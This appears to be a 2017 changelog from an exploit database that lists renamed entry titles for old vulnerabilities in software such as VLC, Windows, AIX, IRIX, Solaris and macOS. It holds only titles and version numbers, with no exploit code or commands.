DB: 2017-11-16

23 new exploits

VideoLAN VLC Media Player 0.8.6a - Unspecified Denial of Service (1)
VideoLAN VLC Media Player 0.8.6a - Denial of Service (1)

Microsoft Windows Explorer - '.AVI' Unspecified Denial of Service
Microsoft Windows Explorer - '.AVI' File Denial of Service

Microsoft Windows Explorer - Unspecified '.ANI' File Denial of Service
Microsoft Windows Explorer - '.ANI' File Denial of Service

Microsoft Windows Explorer - Unspecified '.doc' File Denial of Service
Microsoft Windows Explorer - '.doc' File Denial of Service

CDBurnerXP 4.2.4.1351 - Local Crash (Denial of Service)

Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities
Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Multiple Vulnerabilities

iPhone / iTouch FtpDisc 1.0 3 - ExploitsInOne Buffer Overflow Denial of Service
iPhone / iTouch FtpDisc 1.0 - Buffer Overflow / Denial of Service

Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption (PoC)
Aladdin eToken PKI Client 4.5 - Virtual File Handling Memory Corruption (PoC)

Webby WebServer - SEH Control (PoC)
Webby WebServer - Overflow (SEH) (PoC)

Quick 'n Easy FTP Server Lite 3.1 - Exploit
Quick 'n Easy FTP Server Lite 3.1 - Denial of Service

Subtitle Translation Wizard 3.0.0 - Exploit (SEH) (PoC)
Subtitle Translation Wizard 3.0.0 - Overflow (SEH) (PoC)

FFDshow - SEH Exception Leading to Null Pointer on Read
FFDshow - Overflow (SEH) Exception Leading to Null Pointer on Read

Microsoft Internet Explorer - MSHTML Findtext Processing Issue
Microsoft Internet Explorer - MSHTML Findtext Processing Exploit

Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption
Oreans WinLicense 2.1.8.0 - XML File Handling Memory Corruption
Debian suidmanager 0.18 - Exploit
AMD K6 Processor - Exploit
Apple Personal Web Sharing 1.1 - Remote Denial of Service
AMD K6 Processor - Denial of Service

Sun Solaris 7.0 - 'procfs' Denial of Service

S.u.S.E. Linux 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service
S.u.S.E. Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service

Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - rpc.lockd Remote Denial of Service
Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - 'rpc.lockd' Remote Denial of Service

D-Link DIR605L - Denial of Service

RedHat Linux 6.1 i386 - Tmpwatch Recursive Write Denial of Service

(Linux Kernel) ReiserFS 3.5.28 - Code Execution / Denial of Service
ReiserFS 3.5.28 (Linux Kernel) - Code Execution / Denial of Service

IBM AIX 4.3.3/5.1/5.2 libIM - Buffer Overflow
IBM AIX 4.3.3/5.1/5.2 - 'libIM' Buffer Overflow

xfstt 1.2/1.4 - Unspecified Memory Disclosure
xfstt 1.2/1.4 - Memory Disclosure

ViRobot Linux Server 2.0 - Exploit

Linux Kernel 2.4.x/2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities
Linux Kernel 2.4.x/2.6.x - Multiple ISO9660 Filesystem Handling Vulnerabilities

IBM AIX 5.x - Invscout Local Buffer Overflow
IBM AIX 5.x - 'Invscout' Local Buffer Overflow

Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering Unspecified Buffer Overflow
Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering Buffer Overflow

Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption (MS06-012)
Microsoft Excel 95/97/2000/2002/2003/2004 - Memory Corruption (MS06-012)

IBM Tivoli Directory Server 6.0 - Unspecified LDAP Memory Corruption
IBM Tivoli Directory Server 6.0 - LDAP Memory Corruption

Quake 3 Engine - CL_ParseDownload Remote Buffer Overflow
Quake 3 Engine - 'CL_ParseDownload' Remote Buffer Overflow

Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities
Zabbix 1.1.2 - Multiple Remote Code Execution Vulnerabilities

VideoLAN VLC Media Player 0.8.6a - Unspecified Denial of Service (2)
VideoLAN VLC Media Player 0.8.6a - Denial of Service (2)

Sun Solaris 10 - ICMP Unspecified Remote Denial of Service
Sun Solaris 10 - ICMP Remote Denial of Service

Mozilla Firefox 2.0.0.2 - Unspecified GIF Handling Denial of Service
Mozilla Firefox 2.0.0.2 - '.GIF' Handling Denial of Service

Progress WebSpeed 3.0/3.1 - Denial of Service

GStreamer 0.10.15 - Multiple Unspecified Remote Denial of Service Vulnerabilities
GStreamer 0.10.15 - Multiple Remote Denial of Service Vulnerabilities
Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service
Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service
Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service
Wireshark 0.99.8 - X.509sat Dissector Denial of Service
Wireshark 0.99.8 - LDAP Dissector Denial of Service
Wireshark 0.99.8 - SCCP Dissector Decode As Feature Denial of Service
Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service (1)
Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service (2)
Nokia Lotus Notes Connector - 'lnresobject.dll' Unspecified Remote Denial of Service
Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Remote Denial of Service (1)
Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Remote Denial of Service (2)
Nokia Lotus Notes Connector - 'lnresobject.dll' Remote Denial of Service
Wireshark 1.2.1 - OpcUa Dissector Unspecified Resource Exhaustion (Denial of Service)
Wireshark 1.2.1 - TLS Dissector 1.2 Conversation Handling Unspecified Remote Denial of Service
Wireshark 1.2.1 - GSM A RR Dissector packet.c Unspecified Remote Denial of Service
Wireshark 1.2.1 - OpcUa Dissector Resource Exhaustion (Denial of Service)
Wireshark 1.2.1 - TLS Dissector 1.2 Conversation Handling Remote Denial of Service
Wireshark 1.2.1 - GSM A RR Dissector packet.c Remote Denial of Service

Opera Web Browser < 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities
Opera Web Browser < 11.60 - Denial of Service / Multiple Vulnerabilities

SmallFTPd - Unspecified Denial of Service
SmallFTPd - Denial of Service

Apple Mac OSX - 'IntelAccelerator::gstqConfigure' Exploitable Kernel NULL Dereference
Apple Mac OSX - 'IntelAccelerator::gstqConfigure' Kernel NULL Dereference

Apple Mac OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference
Apple Mac OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Kernel NULL Dereference

Apple Mac OSX - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference
Apple Mac OSX - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient NULL Dereference
Microsoft Windows - 'gdi32.dll' Multiple Issues 'EMF CREATECOLORSPACEW' Record Handling (MS16-055)
Microsoft Windows - 'gdi32.dll' Multiple Issues 'EMF COMMENT_MULTIFORMATS' Record Handling (MS16-055)
Microsoft Windows - 'gdi32.dll' Multiple 'EMF CREATECOLORSPACEW' Record Handling (MS16-055)
Microsoft Windows - 'gdi32.dll' Multiple 'EMF COMMENT_MULTIFORMATS' Record Handling (MS16-055)

Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext
Apple Mac OSX Kernel - Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext
Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleMuxControl.kext
Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl
Apple Mac OSX Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource
Apple Mac OSX Kernel - Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value
Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in IOAudioEngine
Apple Mac OSX Kernel - Null Pointer Dereference in AppleMuxControl.kext
Apple Mac OSX Kernel - Null Pointer Dereference in AppleGraphicsDeviceControl
Apple Mac OSX Kernel - NULL Dereference in IOAccelSharedUserClient2::page_off_resource
Apple Mac OSX Kernel - NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value
Apple Mac OSX Kernel - Null Pointer Dereference in IOAudioEngine

Apple OS X/iOS - mach_ports_register Multiple Memory Safety Issues
Apple OS X/iOS - 'mach_ports_register' Multiple Memory Safety Exploits

Linux Kernel 3.10.0-327/4.8.0-22 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference
Linux Kernel 4.8.0-22/3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference

Microsoft MsMpEng - Remotely Exploitable Use-After-Free due to Design Issue in GC Engine
Microsoft MsMpEng - Remote Use-After-Free Due to Design Issue in GC Engine

Microsoft Windows Kernel - 'win32k.sys' Multiple Issues 'NtGdiGetDIBitsInternal' System Call
Microsoft Windows Kernel - 'win32k.sys' Multiple 'NtGdiGetDIBitsInternal' System Call

Mandrake Linux 8.2 /usr/mail - Local Exploit
Mandrake Linux 8.2 - '/usr/mail' Local Exploit

RedHat 6.2 /sbin/restore - Exploit
RedHat 6.2 - '/sbin/restore' Privilege Escalation

dump 0.4b15 (RedHat 6.2) - Exploit
dump 0.4b15 (RedHat 6.2) - Privilege Escalation
xsoldier 0.96 (RedHat 6.2) - Exploit
Pine (Local Message Grabber) - Exploit
xsoldier 0.96 (RedHat 6.2) - Buffer Overflow
Pine (Local Message Grabber) - Local Message Read

Seyon 2.1 rev. 4b i586-Linux - Exploit
Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Overflow

glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploit
glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - File Read

suid_perl 5.001 - Exploit
suid_perl 5.001 - Command Execution

Sendmail 8.11.x (Linux/i386) - Exploit
Sendmail 8.11.x (Linux/i386) - Privilege Escalation

Microsoft Excel - Unspecified Remote Code Execution
Microsoft Excel - Remote Code Execution

Microsoft Word 2000 - Unspecified Code Execution
Microsoft Word 2000 - Code Execution
IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation
IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation
IBM AIX 5.3 SP6 - Capture Terminal Sequence Privilege Escalation
IBM AIX 5.3 SP6 - 'pioout' Arbitrary Library Loading Privilege Escalation

IBM AIX 5.3 libc - MALLOCDEBUG File Overwrite
IBM AIX 5.3 - 'libc' MALLOCDEBUG File Overwrite

Easy RM to MP3 Converter 2.7.3.700 - Exploit
Easy RM to MP3 Converter 2.7.3.700 - Buffer Overflow

Easy RM to MP3 27.3.700 (Windows XP SP3) - Exploit
Easy RM to MP3 27.3.700 (Windows XP SP3) - Overflow

Adobe Reader and Acrobat - Exploit
Adobe Reader / Acrobat - '.PDF' File Overflow

Mini-stream Ripper (Windows XP SP2/SP3) - Exploit
Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow

DJ Studio Pro 5.1.6.5.2 - Exploit (SEH)
DJ Studio Pro 5.1.6.5.2 - Overflow (SEH)

Winamp 5.572 - Exploit (SEH)
Winamp 5.572 - Overflow (SEH)

ZipScan 2.2c - Exploit (SEH)
ZipScan 2.2c - Overflow (SEH)
Local Glibc shared library (.so) 2.11.1 - Exploit
(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation
Local Glibc Shared Library (.so) 2.11.1 - Code Execution
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation

SyncBack Freeware 3.2.20.0 - Exploit
SyncBack Freeware 3.2.20.0 - Overflow (SEH)

Mediacoder 0.7.3.4672 - Exploit (SEH)
Mediacoder 0.7.3.4672 - Overflow (SEH)

MP3 Workstation 9.2.1.1.2 - Exploit (SEH)
MP3 Workstation 9.2.1.1.2 - Overflow (SEH)

DJ Studio Pro 8.1.3.2.1 - Exploit (SEH)
DJ Studio Pro 8.1.3.2.1 - Overflow (SEH)

MP3 Workstation 9.2.1.1.2 - Exploit (SEH) (Metasploit)
MP3 Workstation 9.2.1.1.2 - Overflow (SEH) (Metasploit)

iworkstation 9.3.2.1.4 - Exploit (SEH)
iworkstation 9.3.2.1.4 - Overflow (SEH)

Nokia MultiMedia Player 1.0 - Exploit (SEH Unicode)
Nokia MultiMedia Player 1.0 - Overflow (SEH Unicode)

POP Peeper 3.7 - Exploit (SEH)
POP Peeper 3.7 - Overflow (SEH)

DVD X Player 5.5 Pro - SEH + ASLR + DEP Bypass
DVD X Player 5.5 Pro - Overflow (SEH + ASLR + DEP Bypass)

DJ Studio Pro 5.1.6.5.2 - Exploit (SEH) (Metasploit)
DJ Studio Pro 5.1.6.5.2 - Overflow (SEH) (Metasploit)

BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass
BlazeVideo HDTV Player 6.6 Professional - Overflow (SEH + ASLR + DEP Bypass)
Slackware Linux 3.4 - 'liloconfig-color' Temporary file
Slackware Linux 3.4 - 'makebootdisk' Temporary file
Slackware Linux 3.4 - 'liloconfig-color' Temporary File
Slackware Linux 3.4 - 'makebootdisk' Temporary File
Slackware Linux 3.4 - 'netconfig' Temporary file
Slackware Linux 3.4 - 'pkgtool' Temporary file
Slackware Linux 3.4 - 'netconfig' Temporary File
Slackware Linux 3.4 - 'pkgtool' Temporary File

Debian suidmanager 0.18 - Command Execution
BSDI BSD/OS 2.1 / FreeBSD 2.1 / IBM AIX 4.2 / SGI IRIX 6.4 / Sun SunOS 4.1.3 - Exploit
HP HP-UX 10.20/11.0 / IBM AIX 4.3 / SCO Unixware 7.0 / Sun Solaris 2.6 - Exploit
Slackware Linux 3.5 - Missing /etc/group Privilege Escalation
BSDI BSD/OS 2.1 / FreeBSD 2.1 / IBM AIX 4.2 / SGI IRIX 6.4 / Sun SunOS 4.1.3 - Buffer Overrun
HP HP-UX 10.20/11.0 / IBM AIX 4.3 / SCO Unixware 7.0 / Sun Solaris 2.6 - Change File Permission
Slackware Linux 3.5 - '/etc/group' Privilege Escalation

Sun Solaris 2.6 power management - Exploit
Sun Solaris 2.6 - power management Exploit
DataLynx suGuard 1.0 - Exploit
Sun Solaris 2.5.1 PAM & unix_scheme - Exploit
Solaris 2.5.1 ffbconfig - Exploit
Solaris 2.5.1 chkey - Exploit
Solaris 2.5.1 Ping - Exploit
SGI IRIX 6.4 ioconfig - Exploit
DataLynx suGuard 1.0 - Privilege Escalation
Sun Solaris 2.5.1 PAM / unix_scheme - 'passwd' Privilege Escalation
Solaris 2.5.1 - 'ffbconfig' Exploit
Solaris 2.5.1 - 'chkey' Exploit
Solaris 2.5.1 - 'Ping' Exploit
SGI IRIX 6.4 - 'ioconfig' Exploit
BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (1)
BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (2)
BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Exploit (1)
BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - '/usr/bin/X11/xlock' Privilege Escalation (2)

Solaris 2.5.1 automount - Exploit
Solaris 2.5.1 - 'automount' Exploit
BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Exploit
Sun Solaris 7.0 dtprintinfo - Buffer Overflow
Sun Solaris 7.0 lpset - Buffer Overflow
BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Privilege Escalation
Sun Solaris 7.0 - '/usr/dt/bin/dtprintinfo' Buffer Overflow
Sun Solaris 7.0 - '/usr/bin/lpset' Buffer Overflow

IBM Remote Control Software 1.0 - Exploit
IBM Remote Control Software 1.0 - Code Execution

Xcmail 0.99.6 - Exploit
Xcmail 0.99.6 - Buffer Overflow
Sun Solaris 7.0 ff.core - Exploit
S.u.S.E. 5.2 lpc - Exploit
Sun Solaris 7.0 - 'ff.core' Exploit
S.u.S.E. 5.2 - 'lpc' Exploit

SGI IRIX 6.2 cdplayer - Exploit
SGI IRIX 6.2 - 'cdplayer' Exploit
SGI IRIX 5.3 Cadmin - Exploit
SGI IRIX 6.0.1 colorview - Exploit
SGI IRIX 5.3 - 'Cadmin' Exploit
SGI IRIX 6.0.1 - 'colorview' Exploit
SGI IRIX 6.3 df - Exploit
SGI IRIX 6.4 - datman/cdman Exploit
SGI IRIX 6.3 - 'df' Exploit
SGI IRIX 6.4 - datman/cdman Exploit
RedHat Linux 2.1 - abuse.console Exploit
SGI IRIX 6.2 fsdump - Exploit
RedHat Linux 5.1 xosview - Exploit
Slackware Linux 3.1 - Buffer Overflow
RedHat Linux 2.1 - 'abuse.console' Exploit
SGI IRIX 6.2 - 'fsdump' Exploit
RedHat Linux 5.1 - xosview
Slackware Linux 3.1 - '/usr/X11/bin/SuperProbe' Buffer Overflow

IBM AIX 4.3 infod - Exploit
IBM AIX 4.3 - 'infod' Exploit

IBM AIX 4.2.1 snap - Insecure Temporary File Creation
IBM AIX 4.2.1 - 'snap' Insecure Temporary File Creation
SGI IRIX 6.4 inpview - Exploit
RedHat Linux 5.0 msgchk - Exploit
IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation
IBM AIX 4.2 ping - Buffer Overflow
IBM AIX 4.2 lchangelv - Buffer Overflow
SGI IRIX 6.4 - 'inpview' Exploit
RedHat Linux 5.0 - 'msgchk' Exploit
IBM AIX 4.2.1 - '/usr/bin/portmir' Buffer Overflow / Insecure Temporary File Creation
IBM AIX 4.2 - 'ping' Buffer Overflow
IBM AIX 4.2 - '/usr/sbin/lchangelv' Buffer Overflow

RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 mailx - Exploit (1)
RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' Exploit (1)

SGI IRIX 6.4 netprint - Exploit
SGI IRIX 6.4 - 'netprint' Exploit

SGI IRIX 5.3/6.2 ordist - Exploit
SGI IRIX 5.3/6.2 - 'ordist' Exploit

SGI IRIX 5.3 pkgadjust - Exploit
SGI IRIX 5.3 - 'pkgadjust' Exploit

Sun Solaris 7.0 procfs - Exploit
IBM AIX 3.2.5 - IFS Exploit
IBM AIX 4.2.1 lquerypv - Exploit
IBM AIX 3.2.5 - 'IFS' Exploit
IBM AIX 4.2.1 - 'lquerypv' File Read
SGI IRIX 6.3 pset - Exploit
SGI IRIX 6.4 rmail - Exploit
SGI IRIX 6.3 - 'pset' Exploit
SGI IRIX 6.4 - 'rmail' Exploit
SGI IRIX 5.2/5.3 serial_ports - Exploit
SGI IRIX 6.4 suid_exec - Exploit
SGI IRIX 5.1/5.2 sgihelp - Exploit
SGI IRIX 6.4 startmidi - Exploit
SGI IRIX 5.2/5.3 - 'serial_ports' Exploit
SGI IRIX 6.4 - 'suid_exec' Exploit
SGI IRIX 5.1/5.2- 'sgihelp' Exploit
SGI IRIX 6.4 - 'startmidi' Exploit

SGI IRIX 6.4 xfsdump - Exploit
SGI IRIX 6.4 - 'xfsdump' Exploit

IBM AIX 4.3.1 adb - Exploit
IBM AIX 4.3.1 - 'adb' Denial of Service
Apple At Ease 5.0 - Exploit
Samba < 2.0.5 - Exploit
Apple At Ease 5.0 - Information Disclosure
Samba < 2.0.5 - Overflow

NetBSD 1.4 / OpenBSD 2.5 /Solaris 7.0 profil(2) - Exploit
NetBSD 1.4 / OpenBSD 2.5 / Solaris 7.0 - 'profil(2)' Modify The Internal Data Space

Mandriva Linux Mandrake 6.0 / Gnome Libs 1.0.8 espeaker - Local Buffer Overflow
Mandriva Linux Mandrake 6.0 / Gnome Libs 1.0.8 - 'espeaker' Local Buffer Overflow

HP-UX 10.20 newgrp - Exploit
HP-UX 10.20 newgrp - Privilege Escalation

BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (2)
BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - '/usr/bin/lpr' Buffer Overrun Privilege Escalation (2)

BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon Exploit
BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon
FreeBSD 3.3/Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow (1)
FreeBSD 3.3/Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow (2)
xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Buffer Overflow (1)
xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Buffer Overflow (2)

Solaris 7.0 kcms_configure - Exploit
Solaris 7.0 - 'kcms_configure Exploit

Windowmaker wmmon 1.0 b2 - Exploit
Windowmaker wmmon 1.0 b2 - Command Execution

Oracle8i Standard Edition 8.1.5 for Linux Installer - Exploit
Oracle8i Standard Edition 8.1.5 for Linux Installer - Privilege Escalation

Standard & Poors ComStock 4.2.4 - Exploit
Standard & Poors ComStock 4.2.4 - Command Execution
KDE 1.1.2 KApplication configfile - Exploit (1)
KDE 1.1.2 KApplication configfile - Exploit (2)
KDE 1.1.2 KApplication configfile - Exploit (3)
KDE 1.1.2 KApplication configfile - Privilege Escalation (1)
KDE 1.1.2 KApplication configfile - Privilege Escalation (2)
KDE 1.1.2 KApplication configfile - Privilege Escalation (3)

BSD 'mailx' 8.1.1-10 - Buffer Overflow (2)
mailx 8.1.1-10 (BSD/Slackware) - Buffer Overflow (2)

Mandrake 7.0/7.1 / RedHat Kon2 0.3.9 - fld Input File Overflow
Mandrake 7.0/7.1 / RedHat Kon2 0.3.9 - '/usr/bin/fld' Input File Overflow
IRIX 6.5.x - GR_OSView Buffer Overflow
SGI IRIX 6.2 libgl.so - Buffer Overflow
IRIX 6.5.x - dmplay Buffer Overflow
IRIX 6.2/6.3 lpstat - Buffer Overflow
IRIX 6.5.x - inpview Race Condition
IRIX 6.5.x - '/usr/sbin/gr_osview' Buffer Overflow
SGI IRIX 6.2 - 'libgl.so' Buffer Overflow
IRIX 6.5.x - '/usr/sbin/dmplay' Buffer Overflow
IRIX 6.2/6.3 - '/bin/lpstat' Buffer Overflow
IRIX 6.5.x - '/usr/lib/InPerson/inpview' Race Condition

IRIX 5.3/6.x - mail Exploit
IRIX 5.3/6.x - '/usr/bin/mail' Buffer Overflow
Libc locale - Exploit (1)
Libc locale - Exploit (2)
Libc locale - Privilege Escalation (1)
Libc locale - Privilege Escalation (2)

GNOME esound 0.2.19 - Unix Domain Socket Race Condition

Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell redirection Race Condition
Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell Redirection Race Condition
IBM AIX 4.x - setsenv Buffer Overflow
IBM AIX 4.3 digest - Buffer Overflow
IBM AIX 4.x - enq Buffer Overflow
IBM AIX 4.3.x - piobe Buffer Overflow
IBM AIX 4.x - '/usr/bin/setsenv' Buffer Overflow
IBM AIX 4.3 - '/usr/lib/lpd/digest' Buffer Overflow
IBM AIX 4.x - 'enq' Buffer Overflow
IBM AIX 4.3.x - '/usr/lib/lpd/piobe' Buffer Overflow

SGI IRIX 6.5 / Solaris 7.0/8 - CDE dtsession Buffer Overflow
SGI IRIX 6.5 / Solaris 7.0/8 CDE - '/usr/dt/bin/dtsession' Buffer Overflow

AIX 4.2/4.3 - piomkapqd Buffer Overflow
AIX 4.2/4.3 - '/usr/lib/lpd/pio/etc/piomkapqd' Buffer Overflow

(Linux Kernel 2.4.17-8) User-Mode Linux - Memory Access Privilege Escalation
User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation

(Linux Kernel) Grsecurity Kernel Patch 1.9.4 - Memory Protection
Grsecurity Kernel Patch 1.9.4 (Linux Kernel) - Memory Protection
QNX RTOS 6.1 - phlocale Environment Variable Buffer Overflow
QNX RTOS 6.1 - PKG-Installer Buffer Overflow
QNX RTOS 6.1 - '/usr/photon/bin/phlocale' Environment Variable Buffer Overflow
QNX RTOS 6.1 - 'PKG-Installer' Buffer Overflow

NCMedia Sound Editor Pro 7.5.1 - SEH + DEP Bypass
NCMedia Sound Editor Pro 7.5.1 - Overflow (SEH + DEP Bypass)

AFD 1.2.x - Working Directory Local Buffer Overflow
AFD 1.2.x - Working Directory Local Buffer Overflow Privilege Escalation

IBM AIX 4.3.x/5.1 - ERRPT Local Buffer Overflow
IBM AIX 4.3.x/5.1 - 'ERRPT' Local Buffer Overflow

HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access
HP-UX 10.x - rs.F3000 Unauthorized Access

Leksbot 1.2 - Multiple Unspecified Vulnerabilities
Leksbot 1.2 - Multiple Vulnerabilities

IBM AIX 4.3.x/5.1 - LSMCODE Environment Variable Local Buffer Overflow
IBM AIX 4.3.x/5.1 - 'LSMCODE' Environment Variable Local Buffer Overflow

IBM UniVerse 10.0.0.9 - uvadmsh Privilege Escalation
IBM UniVerse 10.0.0.9 - 'uvadmsh' Privilege Escalation

ViRobot Linux Server 2.0 - Overflow

(Linux Kernel 2.6) Samba 2.2.8 (Debian / Mandrake) - Share Privilege Escalation
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation
Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (1)
Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (2)
Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (3)
Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (1)
Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (2)
Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (3)

Nvidia Display Driver Service (Nsvr) - Exploit
Nvidia Display Driver Service (Nsvr) - Buffer Overflow
IBM AIX 5.3 - GetShell and GetCommand File Enumeration
IBM AIX 5.3 - GetShell and GetCommand Partial File Disclosure
IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration
IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Disclosure

Apple 2.0.4 - Safari Unspecified Local
Apple 2.0.4 - Safari Local Exploit

Systrace - Multiple System Call Wrappers Concurrency Vulnerabilities

IBM AIX 6.1.8 libodm - Arbitrary File Write
IBM AIX 6.1.8 - 'libodm' Arbitrary File Write

Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation

VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow
VeryPDF HTML Converter 2.0 - Buffer Overflow (SEH/ToLower() Bypass)

Symantec Encryption Desktop 10 - Buffer Overflow Privilege Escalation

QEMU (Gentoo) - Local Priv Escalation
QEMU (Gentoo) - Privilege Escalation

Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation
Apache Tomcat 8/7/6 (RedHat Based Distros) - Privilege Escalation

RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)
RedStar 3.0 Server - 'BEAM' / 'RSSMON' Command Injection (Shellshock)

Microsoft WordPerfect Document Converter - Exploit (MS03-036)
Microsoft WordPerfect Document Converter (Windows NT4 Workstation SP5/SP6 French) - File Template Buffer Overflow (MS03-036)

CA BrightStor ARCserve Backup - Exploiter Tool
CA BrightStor ARCserve Backup - Overflow

NCTAudioEditor2 ActiveX DLL 'NCTWMAFile2.dll 2.6.2.157' - Exploit
NCTAudioEditor2 ActiveX DLL 'NCTWMAFile2.dll 2.6.2.157' - File Write

CDBurnerXP 4.2.4.1351 - Exploit

PeerCast 0.1216 - Exploit (Metasploit)
PeerCast 0.1216 - Stack Overflow (Metasploit)

BigAnt Server 2.52 - Exploit (SEH)
BigAnt Server 2.52 - Overflow (SEH)

NetTransport Download Manager 2.90.510 - Exploit
NetTransport Download Manager 2.90.510 - Overflow (SEH)

File Sharing Wizard 1.5.0 - Exploit (SEH)
File Sharing Wizard 1.5.0 - Overflow (SEH)
Real Player 12.0.0.879 - Exploit
Sun Java Web Server 7.0 u7 - Exploit (DEP Bypass)
Real Player 12.0.0.879 - Code Execution
Sun Java Web Server 7.0 u7 - Overflow (DEP Bypass)

IBM AIX 5l FTPd - Remote DES Hash Exploit
IBM AIX 5l - 'FTPd' Remote DES Hash Exploit

Microsoft Data Access Components - Exploit (MS11-002)
Microsoft Data Access Components - Overflow (PoC) (MS11-002)

FileCOPA FTP Server (Pre 18 Jul Version) - Exploit (Metasploit)
